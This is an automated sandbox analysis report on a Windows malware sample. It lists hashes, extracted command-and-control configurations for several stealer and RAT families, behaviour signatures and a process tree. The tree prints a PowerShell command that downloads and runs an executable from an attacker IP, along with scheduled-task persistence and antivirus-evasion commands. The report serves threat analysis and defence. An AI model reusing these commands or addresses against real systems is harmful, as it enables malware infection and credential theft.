Resubmissions

29/03/2025, 13:58

250329-q9152svvas 10

Analysis

  • max time kernel
    149s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250314-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20250314-enlocale:en-usos:windows10-2004-x64system
  • submitted
    29/03/2025, 13:58

General

  • Target

    2025-03-29_fab7377d0c225be7110b381bbbe53d2e_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe

  • Size

    938KB

  • MD5

    fab7377d0c225be7110b381bbbe53d2e

  • SHA1

    3096dd62d5f3bcfaec2350e2e7484ddf4fea17b1

  • SHA256

    402dfdbcdac8266fdde22e6a8ecc3ad6fd795aaacda7620c4b6ecd615864dd88

  • SHA512

    89769c0cda927e2318ebf1b6b738040f4b723d05923194a515bdf406afd47845cd0f03e3828079bbcd4a81eabc20cd1a4ebce7b756987e0e49d31ae55c2714f5

  • SSDEEP

    24576:sqDEvCTbMWu7rQYlBQcBiT6rprG8a0ku:sTvC/MTQYxsWR7a0k

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Family

amadey

Version

5.21

Botnet

092155

C2

http://176.113.115.6

Attributes
  • install_dir

    bb556cff4a

  • install_file

    rapes.exe

  • strings_key

    a131b127e996a898cd19ffb2d92e481b

  • url_paths

    /Ni9kiput/index.php

rc4.plain

Extracted

Family

vidar

Version

13.3

Botnet

11373d37b176b52c098f600f61cdf190

C2

https://t.me/lw25chm

https://steamcommunity.com/profiles/76561199839170361

Attributes
  • user_agent

    Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 Chrome/132.0.0.0 Safari/537.36 OPR/117.0.0.0

Extracted

Family

lumma

C2

https://wxayfarer.live/ALosnz

https://oreheatq.live/gsopp

https://xcastmaxw.run/ganzde

https://weldorae.digital/geds

https://steelixr.live/aguiz

https://advennture.top/GKsiio

https://7targett.top/dsANGt

https://smeltingt.run/giiaus

https://ferromny.digital/gwpd

https://esccapewz.run/ANSbwqy

https://travewlio.shop/ZNxbHi

https://touvrlane.bet/ASKwjq

https://sighbtseeing.shop/ASJnzh

https://targett.top/dsANGt

https://holidamyup.today/AOzkns

https://mtriplooqp.world/APowko

https://70oreheatq.live/gsopp

https://0castmaxw.run/ganzde

Extracted

Family

quasar

Version

1.5.0

Botnet

Office04

C2

goku92ad.zapto.org:5000

Mutex

a0766e5c-a1d1-4766-a1f5-4e4f9f9fe35a

Attributes
  • encryption_key

    BF72099FDBC6B48816529089CF1CF2CF86357D14

  • install_name

    Client.exe

  • log_directory

    Logs

  • reconnect_delay

    3000

  • startup_key

    Quasar Modded Client Startup

  • subdirectory

    SubDir

Extracted

Family

stealc

Botnet

trump

C2

http://45.93.20.28

Attributes
  • url_path

    /85a1cacf11314eb8.php

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Amadey family
  • Detect Vidar Stealer 32 IoCs
  • Detects Healer an antivirus disabler dropper 3 IoCs
  • Healer

    Healer an antivirus disabler dropper.

  • Healer family
  • Lumma Stealer, LummaC

    Lumma or LummaC is an infostealer written in C++ first seen in August 2022.

  • Lumma family
  • Modifies Windows Defender DisableAntiSpyware settings 3 TTPs 1 IoCs
  • Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
  • Modifies Windows Defender TamperProtection settings 3 TTPs 1 IoCs
  • Modifies Windows Defender notification settings 3 TTPs 2 IoCs
  • Quasar RAT

    Quasar is an open source Remote Access Tool.

  • Quasar family
  • Quasar payload 2 IoCs
  • Stealc

    Stealc is an infostealer written in C++.

  • Stealc family
  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • Vidar family
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 11 IoCs
  • Blocklisted process makes network request 5 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 7 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Downloads MZ/PE file 17 IoCs
  • Uses browser remote debugging 2 TTPs 8 IoCs

    Can be used control the browser and steal sensitive information such as credentials and session cookies.

  • Checks BIOS information in registry 2 TTPs 22 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 4 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Deletes itself 1 IoCs
  • Drops startup file 4 IoCs
  • Executes dropped EXE 24 IoCs
  • Identifies Wine through registry keys 2 TTPs 11 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steal credentials from unsecured files.

  • Windows security modification 2 TTPs 2 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 6 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Drops desktop.ini file(s) 3 IoCs
  • Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs

    Bootkits write to the MBR to gain persistence at a level below the operating system.

  • AutoIT Executable 1 IoCs

    AutoIT scripts compiled to PE executables.

  • Enumerates processes with tasklist 1 TTPs 2 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 11 IoCs
  • Suspicious use of SetThreadContext 6 IoCs
  • Drops file in Windows directory 14 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 57 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks processor information in registry 2 TTPs 22 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
  • Enumerates system info in registry 2 TTPs 6 IoCs
  • Kills process with taskkill 5 IoCs
  • Modifies data under HKEY_USERS 2 IoCs
  • Modifies registry class 2 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: MapViewOfSection 3 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 31 IoCs
  • Suspicious use of FindShellTrayWindow 63 IoCs
  • Suspicious use of SendNotifyMessage 29 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\system32\sihost.exe
    sihost.exe
    1⤵
      PID:2696
      • C:\Windows\SysWOW64\fontdrvhost.exe
        "C:\Windows\System32\fontdrvhost.exe"
        2⤵
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        PID:2996
    • C:\Users\Admin\AppData\Local\Temp\2025-03-29_fab7377d0c225be7110b381bbbe53d2e_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
      "C:\Users\Admin\AppData\Local\Temp\2025-03-29_fab7377d0c225be7110b381bbbe53d2e_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe"
      1⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of SendNotifyMessage
      • Suspicious use of WriteProcessMemory
      PID:6092
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c schtasks /create /tn thIUjma4YCM /tr "mshta C:\Users\Admin\AppData\Local\Temp\dnUZr3iiD.hta" /sc minute /mo 25 /ru "Admin" /f
        2⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:2992
        • C:\Windows\SysWOW64\schtasks.exe
          schtasks /create /tn thIUjma4YCM /tr "mshta C:\Users\Admin\AppData\Local\Temp\dnUZr3iiD.hta" /sc minute /mo 25 /ru "Admin" /f
          3⤵
          • System Location Discovery: System Language Discovery
          • Scheduled Task/Job: Scheduled Task
          PID:5300
      • C:\Windows\SysWOW64\mshta.exe
        mshta C:\Users\Admin\AppData\Local\Temp\dnUZr3iiD.hta
        2⤵
        • Checks computer location settings
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:5376
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'5PYALEMYKDJRP9TXI3VBYRXL9GG3ZKFX.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
          3⤵
          • Blocklisted process makes network request
          • Command and Scripting Interpreter: PowerShell
          • Downloads MZ/PE file
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:5380
          • C:\Users\Admin\AppData\Local\Temp5PYALEMYKDJRP9TXI3VBYRXL9GG3ZKFX.EXE
            "C:\Users\Admin\AppData\Local\Temp5PYALEMYKDJRP9TXI3VBYRXL9GG3ZKFX.EXE"
            4⤵
            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
            • Checks BIOS information in registry
            • Checks computer location settings
            • Executes dropped EXE
            • Identifies Wine through registry keys
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • Drops file in Windows directory
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of FindShellTrayWindow
            • Suspicious use of WriteProcessMemory
            PID:2088
            • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
              "C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
              5⤵
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Downloads MZ/PE file
              • Checks BIOS information in registry
              • Checks computer location settings
              • Executes dropped EXE
              • Identifies Wine through registry keys
              • Adds Run key to start application
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • System Location Discovery: System Language Discovery
              • Modifies registry class
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of WriteProcessMemory
              PID:1400
              • C:\Users\Admin\AppData\Local\Temp\10369460101\Rm3cVPI.exe
                "C:\Users\Admin\AppData\Local\Temp\10369460101\Rm3cVPI.exe"
                6⤵
                • Executes dropped EXE
                • System Location Discovery: System Language Discovery
                • Suspicious behavior: EnumeratesProcesses
                PID:5840
              • C:\Users\Admin\AppData\Local\Temp\10369470101\6cb04421f6.exe
                "C:\Users\Admin\AppData\Local\Temp\10369470101\6cb04421f6.exe"
                6⤵
                • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                • Checks BIOS information in registry
                • Executes dropped EXE
                • Identifies Wine through registry keys
                • Writes to the Master Boot Record (MBR)
                • Suspicious use of NtSetInformationThreadHideFromDebugger
                • System Location Discovery: System Language Discovery
                • Suspicious behavior: EnumeratesProcesses
                PID:4660
              • C:\Users\Admin\AppData\Local\Temp\10369480101\TbV75ZR.exe
                "C:\Users\Admin\AppData\Local\Temp\10369480101\TbV75ZR.exe"
                6⤵
                • Executes dropped EXE
                • Suspicious use of SetThreadContext
                • Suspicious use of WriteProcessMemory
                PID:3456
                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                  7⤵
                  • Suspicious use of NtCreateUserProcessOtherParentProcess
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of WriteProcessMemory
                  PID:348
                  • C:\Windows\SysWOW64\WerFault.exe
                    C:\Windows\SysWOW64\WerFault.exe -u -p 348 -s 492
                    8⤵
                    • Program crash
                    PID:3736
              • C:\Users\Admin\AppData\Local\Temp\10369490101\hYjiwV0.exe
                "C:\Users\Admin\AppData\Local\Temp\10369490101\hYjiwV0.exe"
                6⤵
                • Executes dropped EXE
                • Suspicious use of SetThreadContext
                • Suspicious use of WriteProcessMemory
                PID:5432
                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                  7⤵
                    PID:1556
                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                    7⤵
                    • System Location Discovery: System Language Discovery
                    • Checks processor information in registry
                    • Suspicious behavior: EnumeratesProcesses
                    PID:1432
                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
                      8⤵
                      • Uses browser remote debugging
                      • Checks processor information in registry
                      • Enumerates system info in registry
                      • Modifies data under HKEY_USERS
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                      • Suspicious use of AdjustPrivilegeToken
                      • Suspicious use of FindShellTrayWindow
                      PID:5944
                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffddf5adcf8,0x7ffddf5add04,0x7ffddf5add10
                        9⤵
                          PID:1560
                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --field-trial-handle=2068,i,3403330732152572379,269394411656535513,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=2064 /prefetch:3
                          9⤵
                            PID:4576
                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=2024,i,3403330732152572379,269394411656535513,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=2012 /prefetch:2
                            9⤵
                              PID:4452
                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --field-trial-handle=2380,i,3403330732152572379,269394411656535513,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=2552 /prefetch:8
                              9⤵
                                PID:5976
                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3244,i,3403330732152572379,269394411656535513,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=3256 /prefetch:1
                                9⤵
                                • Uses browser remote debugging
                                PID:4364
                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3260,i,3403330732152572379,269394411656535513,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=3300 /prefetch:1
                                9⤵
                                • Uses browser remote debugging
                                PID:1436
                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --extension-process --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4304,i,3403330732152572379,269394411656535513,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=4320 /prefetch:2
                                9⤵
                                • Uses browser remote debugging
                                PID:2128
                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4664,i,3403330732152572379,269394411656535513,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=4700 /prefetch:1
                                9⤵
                                • Uses browser remote debugging
                                PID:5688
                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5288,i,3403330732152572379,269394411656535513,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=5320 /prefetch:8
                                9⤵
                                  PID:1312
                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5532,i,3403330732152572379,269394411656535513,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=5548 /prefetch:8
                                  9⤵
                                    PID:1636
                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=4812,i,3403330732152572379,269394411656535513,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=5436 /prefetch:8
                                    9⤵
                                      PID:972
                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=4196,i,3403330732152572379,269394411656535513,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=5580 /prefetch:8
                                      9⤵
                                        PID:2292
                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5740,i,3403330732152572379,269394411656535513,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=5840 /prefetch:8
                                        9⤵
                                          PID:2060
                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5340,i,3403330732152572379,269394411656535513,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=5980 /prefetch:8
                                          9⤵
                                            PID:4732
                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
                                          8⤵
                                          • Uses browser remote debugging
                                          • Enumerates system info in registry
                                          • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                                          • Suspicious use of FindShellTrayWindow
                                          PID:5900
                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x23c,0x240,0x244,0x238,0x2f4,0x7ffddfa6f208,0x7ffddfa6f214,0x7ffddfa6f220
                                            9⤵
                                              PID:4604
                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2216,i,2731323549986238075,15624746990200533799,262144 --variations-seed-version --mojo-platform-channel-handle=2212 /prefetch:2
                                              9⤵
                                                PID:3528
                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=1944,i,2731323549986238075,15624746990200533799,262144 --variations-seed-version --mojo-platform-channel-handle=2296 /prefetch:3
                                                9⤵
                                                  PID:4596
                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=2436,i,2731323549986238075,15624746990200533799,262144 --variations-seed-version --mojo-platform-channel-handle=2664 /prefetch:8
                                                  9⤵
                                                    PID:4040
                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3452,i,2731323549986238075,15624746990200533799,262144 --variations-seed-version --mojo-platform-channel-handle=3496 /prefetch:1
                                                    9⤵
                                                    • Uses browser remote debugging
                                                    PID:4776
                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --instant-process --pdf-upsell-enabled --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3476,i,2731323549986238075,15624746990200533799,262144 --variations-seed-version --mojo-platform-channel-handle=3484 /prefetch:1
                                                    9⤵
                                                    • Uses browser remote debugging
                                                    PID:5788
                                                • C:\Windows\SysWOW64\cmd.exe
                                                  "C:\Windows\system32\cmd.exe" /c timeout /t 11 & rd /s /q "C:\ProgramData\47q16" & exit
                                                  8⤵
                                                  • System Location Discovery: System Language Discovery
                                                  PID:4192
                                                  • C:\Windows\SysWOW64\timeout.exe
                                                    timeout /t 11
                                                    9⤵
                                                    • System Location Discovery: System Language Discovery
                                                    • Delays execution with timeout.exe
                                                    PID:888
                                            • C:\Users\Admin\AppData\Local\Temp\10369500101\EPTwCQd.exe
                                              "C:\Users\Admin\AppData\Local\Temp\10369500101\EPTwCQd.exe"
                                              6⤵
                                              • Executes dropped EXE
                                              • Suspicious use of SetThreadContext
                                              • Suspicious use of WriteProcessMemory
                                              PID:5464
                                              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                7⤵
                                                • System Location Discovery: System Language Discovery
                                                • Suspicious behavior: EnumeratesProcesses
                                                PID:3152
                                            • C:\Users\Admin\AppData\Local\Temp\10369510101\7IIl2eE.exe
                                              "C:\Users\Admin\AppData\Local\Temp\10369510101\7IIl2eE.exe"
                                              6⤵
                                              • Checks computer location settings
                                              • Executes dropped EXE
                                              • Drops file in Windows directory
                                              • System Location Discovery: System Language Discovery
                                              PID:5612
                                              • C:\Windows\SysWOW64\CMD.exe
                                                "C:\Windows\system32\CMD.exe" /c copy Expectations.cab Expectations.cab.bat & Expectations.cab.bat
                                                7⤵
                                                • System Location Discovery: System Language Discovery
                                                PID:2264
                                                • C:\Windows\SysWOW64\tasklist.exe
                                                  tasklist
                                                  8⤵
                                                  • Enumerates processes with tasklist
                                                  • System Location Discovery: System Language Discovery
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  PID:720
                                                • C:\Windows\SysWOW64\findstr.exe
                                                  findstr /I "opssvc wrsa"
                                                  8⤵
                                                  • System Location Discovery: System Language Discovery
                                                  PID:3312
                                                • C:\Windows\SysWOW64\tasklist.exe
                                                  tasklist
                                                  8⤵
                                                  • Enumerates processes with tasklist
                                                  • System Location Discovery: System Language Discovery
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  PID:4016
                                                • C:\Windows\SysWOW64\findstr.exe
                                                  findstr "SophosHealth bdservicehost AvastUI AVGUI nsWscSvc ekrn"
                                                  8⤵
                                                  • System Location Discovery: System Language Discovery
                                                  PID:5532
                                                • C:\Windows\SysWOW64\cmd.exe
                                                  cmd /c md 418377
                                                  8⤵
                                                  • System Location Discovery: System Language Discovery
                                                  PID:4400
                                                • C:\Windows\SysWOW64\extrac32.exe
                                                  extrac32 /Y /E Leon.cab
                                                  8⤵
                                                  • System Location Discovery: System Language Discovery
                                                  PID:5688
                                                • C:\Windows\SysWOW64\findstr.exe
                                                  findstr /V "BEVERAGES" Compilation
                                                  8⤵
                                                  • System Location Discovery: System Language Discovery
                                                  PID:1204
                                                • C:\Windows\SysWOW64\cmd.exe
                                                  cmd /c copy /b 418377\Passwords.com + Playing + New + Realized + Uw + Jpeg + Badly + Asbestos + Seeds + Service + Basis + Via 418377\Passwords.com
                                                  8⤵
                                                  • System Location Discovery: System Language Discovery
                                                  PID:2360
                                                • C:\Windows\SysWOW64\cmd.exe
                                                  cmd /c copy /b ..\Pendant.cab + ..\Visitor.cab + ..\Illegal.cab + ..\Suddenly.cab + ..\Theology.cab + ..\Kidney.cab + ..\Flying.cab + ..\Tigers.cab N
                                                  8⤵
                                                  • System Location Discovery: System Language Discovery
                                                  PID:4240
                                                • C:\Users\Admin\AppData\Local\Temp\418377\Passwords.com
                                                  Passwords.com N
                                                  8⤵
                                                  • Executes dropped EXE
                                                  • System Location Discovery: System Language Discovery
                                                  • Suspicious behavior: EnumeratesProcesses
                                                  • Suspicious use of FindShellTrayWindow
                                                  • Suspicious use of SendNotifyMessage
                                                  PID:4936
                                                • C:\Windows\SysWOW64\choice.exe
                                                  choice /d y /t 5
                                                  8⤵
                                                  • System Location Discovery: System Language Discovery
                                                  PID:3016
                                            • C:\Windows\SysWOW64\cmd.exe
                                              "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\10369541121\8BNn7ce.cmd"
                                              6⤵
                                              • System Location Discovery: System Language Discovery
                                              PID:2568
                                              • C:\Windows\SysWOW64\cmd.exe
                                                C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\10369541121\8BNn7ce.cmd"
                                                7⤵
                                                • System Location Discovery: System Language Discovery
                                                PID:2748
                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
